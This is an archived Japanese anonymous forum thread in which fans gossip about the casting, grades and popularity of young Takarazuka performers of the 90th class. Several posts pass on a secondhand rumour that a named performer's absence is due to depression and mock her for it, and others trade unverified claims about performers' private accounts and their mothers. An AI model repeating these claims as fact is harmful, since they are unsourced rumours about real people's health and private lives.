ファントムからずっと休演してる。
「病気」ってなんか不安になる…。

277 :名無しさん@花束いっぱい。:2006/12/27(水) 18:51:59 ID:NqH/BIw3
てか2公演も連続で休演なんてさせてもらえるの?
劇団甘いね。

278 :名無しさん@花束いっぱい。:2006/12/27(水) 23:00:37 ID:RITji455
心の病気?

279 :名無しさん@花束いっぱい。:2006/12/27(水) 23:27:20 ID:NqH/BIw3
舞台出なくても給料もらえるもんね!
普通の世界ではありえない!給料泥棒じゃん。
ファントムで従者に入れなかったから?w

280 :名無しさん@花束いっぱい。:2006/12/28(木) 09:37:47 ID:6tfl1Tm4
花組男役もっとがんばれ!!

281 :名無しさん@花束いっぱい。:2006/12/28(木) 12:13:20 ID:dtZQrotc
悠奈さん花Pにすごく絞られてうつになっちゃったって…。贔屓が言ってた。頑張って〜!

282 :名無しさん@花束いっぱい。:2006/12/28(木) 12:16:31 ID:dtZQrotc
×奈→○南だね( ̄□ ̄;)!! 
失礼しました。逝ってくる。

283 :名無しさん@花束いっぱい。:2006/12/28(木) 12:29:31 ID:1UJRfzG0
>>281 お前の贔屓って最低だな。
そしてそんな事ここに軽々しく書いてるお前も最低。
誰?煌雅ファン?か瀬戸ファン?

284 :名無しさん@花束いっぱい。:2006/12/28(木) 13:56:12 ID:O84rra6J
アーサーは自分も休演経験者なのに、そんなコト言わないよ

285 :名無しさん@花束いっぱい。:2006/12/28(木) 14:51:46 ID:Xt1CUmf5
>283
281のカキコを真に受けるフリして、他の名前をだすなよ。

286 :名無しさん@花束いっぱい。:2006/12/28(木) 14:59:36 ID:1UJRfzG0
じゃあ誰のファンか書きなよ、>>281
皆が迷惑だって言ってるよ〜w
そこまで書いたバカなお前のせいだからさw

287 :名無しさん@花束いっぱい。:2006/12/28(木) 16:17:59 ID:ORO6lFjl
ほんとに>>281みたいな頭悪そうなファンを持つ生徒も可哀想だよねー、まっどっちもどっちで
同じ程度の低い生徒にファンなんだろうなww

>>280 今回は役がないだけだよ。花組観てる?ネコ・るなはずっと着々と使われてるよ。

それより雪星影配役出たよ。れの来たねー、やっぱ路線扱いかな。

288 :名無しさん@花束いっぱい。:2006/12/28(木) 16:47:25 ID:Xt1CUmf5
え、あれだけで路線扱い?

289 :名無しさん@花束いっぱい。:2006/12/28(木) 17:00:15 ID:ORO6lFjl
上級生でも役ついてない人もたくさんいる中、役ついたら「期待されてる」って事でしょう。
スカフェもWトリオもやったし堕天使も上級生もセリフのない中、セリフもあった。
逆にどう見たら脇(期待されてない・使われてない)と!??w

290 :名無しさん@花束いっぱい。:2006/12/28(木) 19:14:39 ID:dtZQrotc
花組じゃないんだけど…。>私の贔屓
みんな知りたがってるから悠南さんと仲いい贔屓に聞いてあげたんです。

291 :名無しさん@花束いっぱい。:2006/12/28(木) 19:34:52 ID:1UJRfzG0
ネットに載せるなんてDQNだな。
生徒が見たら身元バレバレなのにw

292 :名無しさん@花束いっぱい。:2006/12/28(木) 22:12:44 ID:ZWrRi7Yd
ダンサーじゃないから従僕しかまわってこなくて
台詞があったけどねぇ。
スカフェってやってないじゃん。

上級生飛ばしたと言ってもねぇ。
これだけの材料でキターといわれてもねぇ

293 :名無しさん@花束いっぱい。:2006/12/29(金) 00:46:32 ID:1pTpPrEd
れのちゃんもうアンチいるんだねw それだけ有望って事じゃんw
もしかして>>292も面白く思わない同期の親なのかな?w

悠南さんは誰かが言ってた通り、「ファントムの従者に入れなかったから」
それまで扱い良かったからねー。でも精神的に弱い子はこの後も続かないと思う。
でもホント2公演も休めるんだね。一年間も休演は許されるのかな?

294 :名無しさん@花束いっぱい。:2006/12/29(金) 00:49:43 ID:2c1o7e8L
ベルばらの小公子はかなりポイント高いのでは?
小公子は路線以外ありえない。

295 :名無しさん@花束いっぱい。:2006/12/29(金) 00:56:19 ID:1pTpPrEd
うん次はスカフェリになりそうだしね。Wトリオに選ばれてたのもポイント高いよ。

296 :名無しさん@花束いっぱい。:2006/12/29(金) 08:36:58 ID:Z8e1lVjz
悠○のこと、誰に聞いたとか騒いでるけど、
某ソーシャルネットで本人が書いてるんだよ?
(部分部分事実とは、偽って書いてるけど)
波がある病気だから集合日から千秋楽まで100%お休みしないってのは
難しいよな。

297 :名無しさん@花束いっぱい。:2006/12/29(金) 09:01:14 ID:aXWe0TTB
ベルばらの小公子は、本公も新公も非路線でもなってますがなにか?

堕天使の新公は何の役だったんですかぁ。
ちなみに292ですよ、わたし。

ほんとの事書くと同期の親って書かれるんだぁ。
必死でかわいそう、れのファン

298 :名無しさん@花束いっぱい。:2006/12/29(金) 17:38:20 ID:sSMU9r8N
基地害はスルーw

299 :名無しさん@花束いっぱい。:2006/12/29(金) 23:07:45 ID:C1neiGMH
各組男役で一番使われてる彩城、響、香綾、如月、鳳樹は
それぞれの組内男役で一番成績が良いよね。
それを考えると、れのの役付きは成績からは考えられない程いいと思うよ。
言っとくけど、れのファンじゃないからね。どっちかっつーと好きではないタイプ。でも優遇されてるのは素直に認めるよ。

300 :名無しさん@花束いっぱい。:2006/12/29(金) 23:26:41 ID:sSMU9r8N
うん、本当の事書いたら“ファン”だってw
同期の活躍面白くなくて認めたくないんだろうね。
どっちが必死なんだか、アンチさんw
人の活躍羨む前に、自分が努力すれば?

301 :名無しさん@花束いっぱい。:2006/12/30(土) 09:52:26 ID:FIbtP0Eh
れのちゃんだけじゃないじゃん。役付き良いの。
なんてれのちゃんだけここで言われるのかな。

ところで堕天使新人公演のれのちゃんの役はなに?

302 :名無しさん@花束いっぱい。:2006/12/30(土) 16:43:15 ID:xdweI4Th
>>301他のそこそこ使われてる男役は、れのほど成績悪くないからw
っつーか、役付きいい男役なんかあんまりいないだろ?90期。

303 :名無しさん@花束いっぱい。:2006/12/30(土) 19:11:33 ID:y3Lo/iJf
れのって、予科時代から噂がたえないよね。ある意味可哀相だよ。
でもこれだけ良くも悪くも目立ってるって事は、それだけ注目されてるって事だし負けないで欲しい。ってこんなとこ見てないか。

組配属直後の公演から八人口だったし、相当虐められてるんだろうなぁ

304 :名無しさん@花束いっぱい。:2006/12/31(日) 02:14:06 ID:W0QKUMAF
90期って娘役はまあまあ人気あるみたいだけど、男役は今一つ盛り上がらないからね〜
その中でも人気のれのは注目されちゃうんだろうね
他に本当に人気あるのは誰かわからないし。
ここでは冴月、瀬戸、風羽、海桐って感じだけど、実際に何人ものファンを見た!なんてないしねw

305 :名無しさん@花束いっぱい。:2006/12/31(日) 14:27:57 ID:WqaKcut8
いつもの煽りチャンはスルーw

306 :名無しさん@花束いっぱい。:2006/12/31(日) 14:40:59 ID:Eyt3I26I
れのちゃん、今日は誕生日だよ!
おめでとう!

307 :名無しさん@花束いっぱい。:2007/01/01(月) 23:24:24 ID:4pbCCjkE
>他に本当に人気あるのは誰かわからないし。
>ここでは冴月、瀬戸、風羽、海桐って感じだけど、実際に何人ものファンを見た!なんてないしねw

人気有るんじゃなくて、ファンが痛いの間違いでしょ。

308 :名無しさん@花束いっぱい。:2007/01/02(火) 00:17:09 ID:1lBC96HP
別にその4人も“ここで”人気なんかないし。
どういう基準で名前出してるかも判らない真性の痛い煽りレスに痛いレスするな。
名前出すヤツって叩きたいだけと見なされます。

以下違う話題をどうぞ。

309 :名無しさん@花束いっぱい。:2007/01/02(火) 17:34:04 ID:/nF0jTYP
それぞれ場面数に若干の多い少ないはあるけど
どの組も90期はヤバイとオモ
91期92期に抜かれそう。

310 :名無しさん@花束いっぱい。:2007/01/03(水) 09:32:04 ID:wAQymvc/
海桐さんって人気あるの?全然 役付いてないよね。成績も悪いし…
月組で一番扱いがいいのはやっぱり宇月さんだよね。でもあんまりファンいないみたいだけど。


311 :名無しさん@花束いっぱい。:2007/01/03(水) 10:50:02 ID:E8BJMhUi
レビジューのタンゴの場面観て、宇月さん気になった

312 :名無しさん@花束いっぱい。:2007/01/03(水) 11:22:19 ID:znAj6d7z
ルナちゃん次の新公まとぶんの役なの!?
本人がそんなこと言ってたって…おめでとう!

313 :名無しさん@花束いっぱい。:2007/01/03(水) 11:52:50 ID:QVcpXY62
w またまたアンチ乙。

314 :名無しさん@花束いっぱい。:2007/01/03(水) 14:47:18 ID:+Ogd/udG
庭のメル友募集、いい年してるのにメアドがイタイ。
こんなファンがついて可哀相。
お付き気取りか?

315 :omikujidama:2007/01/03(水) 17:15:04 ID:KJFkJspq
痛い

316 :名無しさん@花束いっぱい。:2007/01/03(水) 17:15:04 ID:+lBcnChg
>310
何でまた海桐さん出すかな
宇月さんのことだけ書けばいんじゃねーの
いちいち引き合いに出してageてるとこみると
いつもの私怨海桐ヲタだな
いいかげん成仏しろ

317 :名無しさん@花束いっぱい。:2007/01/03(水) 17:16:16 ID:KJFkJspq
痛い

318 :名無しさん@花束いっぱい。:2007/01/03(水) 22:28:06 ID:vjGafEUO
れのちゃん、本当に役付きいいっていうなら新公でサリエルやったと思う。
最近はずされ気味じゃないの?

319 :名無しさん@花束いっぱい。:2007/01/03(水) 22:43:48 ID:XeI7EPCR
>>316
かいどうファンにうんざりな宇月ファンにも見える。
だって、宇月が一番扱い良いって自身持って断言してるとこ、痛いもん。

320 :名無しさん@花束いっぱい。:2007/01/03(水) 23:40:48 ID:MHO+IS0C
月男はどう見たって扱いは響さんが一番だよ。
煽りじゃなくて、人気は確かに海桐さんが一番と思う。周囲でも海桐さん好きって声は結構聞くし。実力は???だけどね。
宇月さんはどうかな〜。ダンスは抜群なんだけどね。
彩星さんはその内出てくると思うよ。路線にのるかはわからないけど。バックの力の入れ方凄いしね。
でも5組とも一番扱いいい男役が一番人気じゃないみたいだよ。星は微妙だけど。
今年もう研4なんだけど、この期から新公主演でるのかな(;_;)
ヒロインは蒼乃さんあたりきそうだけど…芽吹さんも抜かされちゃったし。
新公学年が近々研6迄になるのに一人位出てほしいよ。
香綾さんにちょっと期待してるんだけど。もし、れのがなったらマジで腰ヌカスかもw
反論あるだろうな…長文ごめんなさい。

321 :名無しさん@花束いっぱい。:2007/01/03(水) 23:58:14 ID:Q6jSZ2WR
もうどうでもいいけど、冬厨・アンチ・ウザレス続きいいかげんにしてくれ!
全員出て行けよ!!

322 :名無しさん@花束いっぱい。:2007/01/04(木) 00:21:43 ID:vsdSV6nV
えっ!!本当に研6までになるの!?
だったら新公主役危ないかもね。たしかにガオリに期待するしかないかも。

323 :名無しさん@花束いっぱい。:2007/01/04(木) 04:28:07 ID:XTiLivKK
>>312
だいもんを抜いたって事?
2番手のまとぶさんの役はないでしょ。



324 :名無しさん@花束いっぱい。:2007/01/04(木) 05:16:11 ID:9zNdreDb
お子ちゃまアンチにマジレスかっこ悪い。
それとも相手にされなかったから、自演で蒸し返してるの?w
いい加減ほんとウザイよ、冬厨。

325 :名無しさん@花束いっぱい。:2007/01/04(木) 07:47:29 ID:13ZP9RFS
彩星のダンスレベルじゃ、抜擢はありえないだろ
現にダンス場面では瑞羽に抜かれてるし。
響、宇月と上二人がダンス実力はだから、何で成績稼いだんだろう?

326 :名無しさん@花束いっぱい。:2007/01/04(木) 09:55:24 ID:NOrvYEzW
ガオリもないやろー彼女は老けしか出来ないしやな

だからといって、れのも


ない


作品によるかもな。ベルばらとかなられのしかいないが。90期は難しいかもなー

327 :名無しさん@花束いっぱい。:2007/01/04(木) 11:58:51 ID:5IP3bGjd
花の90娘は全員個性が違ってそれぞれ好きだったのに
あからさまに91期に抜かされちゃって残念(´д`)

328 :名無しさん@花束いっぱい。:2007/01/04(木) 17:08:33 ID:xxv9b8bk
彩星さんは今回のショーでもダンスで抜擢されてるけどあんまり
うまくはなかったような気がするけど、成績がいいのは
演技がうまいからじゃない??

329 :名無しさん@花束いっぱい。:2007/01/05(金) 15:56:48 ID:9Ycm48M8
演技って成績対象なの?歌かとおもった>彩星

330 :名無しさん@花束いっぱい。:2007/01/06(土) 20:40:53 ID:4LPaZIOc
るなちゃんまとぶさんの役は無理かもだけど、抜擢ありそうで楽しみ

331 :名無しさん@花束いっぱい。:2007/01/06(土) 21:05:19 ID:bZZR0d8H
冴月アンチしつこい。海桐ス○ーカーファソと同じぐらいウザイね。

332 :名無しさん@花束いっぱい。:2007/01/06(土) 21:22:33 ID:edq/9gjG
330ってアンチなの?ただのしつこいファンじゃない?
るなもアンチがいるほど目立ってるとは思えないんだけど…。90では目立ってるほうなのか…

333 :名無しさん@花束いっぱい。:2007/01/06(土) 21:33:10 ID:aHU5weZA
彩羽さんって○○シィやってるんだね。
今ドキの子っぽくて驚いた

334 :名無しさん@花束いっぱい。:2007/01/06(土) 21:53:31 ID:bZZR0d8H
>>332
過去スレからずーっとしつこいアンチがいるのご存じないのかな?
蒼乃、愛原、ゆゆ、れの、冴月にはしつこいアンチがずーっといるのは有名。
お子ちゃま丸出しが特徴だけどねw

335 :名無しさん@花束いっぱい。:2007/01/06(土) 22:38:09 ID:1bU21tEM
ミクシィは1ヶ月位前に劇団がやってる人は退会するように注意したはず・・
だまやってるのばれたらやばいな。

336 :名無しさん@花束いっぱい。:2007/01/06(土) 23:26:42 ID:aHU5weZA
ミクシィ位大丈夫なんじゃない?
劇団そこまで厳しいの?

337 :名無しさん@花束いっぱい。:2007/01/07(日) 10:24:03 ID:Lst4EPRl
組によっては試験も終わってるよね。
大幅な入れ替えとかあったのかな?

成績下位のご贔屓タンが気になる・・・・
期待はしてないけど・・・

338 :名無しさん@花束いっぱい。:2007/01/07(日) 13:12:07 ID:w8styEVx
さっつん、良い声だったな。なかなか良い

339 :名無しさん@花束いっぱい。:2007/01/07(日) 14:32:54 ID:Vm+0NniT
>>336
全組注意されたわけじゃないのかも。
星とどっかもう1つの組は確実に注意が入った。

340 :名無しさん@花束いっぱい。:2007/01/07(日) 20:48:47 ID:eysEAMuG
<<339
雪?彩○さんミクシィ退会したみたい。
ジェンヌも2ちゃん見てるんだね。

341 :名無しさん@花束いっぱい。:2007/01/07(日) 23:34:50 ID:dllYevHn
今日、月観たけど、90期、かわいそうなくらい出番ないね。
けどショーのまっつんはアンチいても納得なくらい格好良かった。
あと、自分的にはちびあずちゃんがお姉ちゃんに似てきたなって思った。
月観た方、どう思います?
ちびあずちゃんってお付きさんやファンのかたいるのかな?

342 :名無しさん@花束いっぱい。:2007/01/09(火) 05:45:40 ID:ZEo7nhAr
>>320タレント契約が新公終了後研8に上がる時ってのが、研5か6になるってのは聞いたことがあるが、
新公学年は研7までで変わらないんジャマイカ?


343 :名無しさん@花束いっぱい。:2007/01/09(火) 10:43:33 ID:kbCZAIm+
新公も研6までって聞いたよ。タレント契約になれば新公は出れないつーことジャネ?

344 :名無しさん@花束いっぱい。:2007/01/09(火) 13:59:58 ID:ze40wtU7
まっつんの出番教えて

345 :名無しさん@花束いっぱい。:2007/01/10(水) 17:02:49 ID:b8tklxGB
れのって絶対ストーカーいるよね。いつも情報が細かいし、ファンが知らないような事がネットにのったり。
全部本当なのかは知らないが、あまりに噂が立ちすぎて見ていて恐くなる時がある。

346 :名無しさん@花束いっぱい。:2007/01/10(水) 23:30:04 ID:t1cQNYBF
例えば??

347 :名無しさん@花束いっぱい。:2007/01/10(水) 23:31:40 ID:DbdnzyAZ
海ママってすごいよね。あと私が知ってる所でママがすごいがんばって出しゃばってるのは
ゆゆ、花音、彩城ママ。
知らないだけでもっといると思う。宙・星ってすごいってあったけどどう?

348 :名無しさん@花束いっぱい。:2007/01/10(水) 23:39:12 ID:jpcyUwAv
>>347
どんなふうにすごいの?

349 :名無しさん@花束いっぱい。:2007/01/10(水) 23:46:17 ID:DbdnzyAZ
海ママは研一からチケット取次ぎの案内出してるしw
他のママもチケットがんばってるww 娘の為に同期をライバル視、んで必死って感じw

350 :名無しさん@花束いっぱい。:2007/01/10(水) 23:48:34 ID:DbdnzyAZ
上のママ達、同期を蹴散らす悪口も言いまくりだよw

351 :名無しさん@花束いっぱい。:2007/01/10(水) 23:56:48 ID:jpcyUwAv
>>349
研1からチケットの取り次ぎの案内ってすごいね

352 :名無しさん@花束いっぱい。:2007/01/11(木) 00:02:58 ID:SNbQoSGq
海ママって、海桐?海?どっち?

353 :名無しさん@花束いっぱい。:2007/01/11(木) 01:02:53 ID:ousllHTq
>>352 普通に考えろよ

花音ままはベラベラ野望を普通にしゃべってたよ。
あのままって、同期のお茶飲み会偵察に行くんでしょ?

354 :名無しさん@花束いっぱい。:2007/01/11(木) 01:58:01 ID:V7wvhA2G
>>353
まじで? そこまでするか〜?怖ぇ〜 同期って宙組同期の?

>>349
瀬戸ままもチケットすごいよ〜? そんなに頑張ってももう役付き関係ないのに・・・w
つかもうすぐ研4なのに、まだまま出て来てるんだよねw

76 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)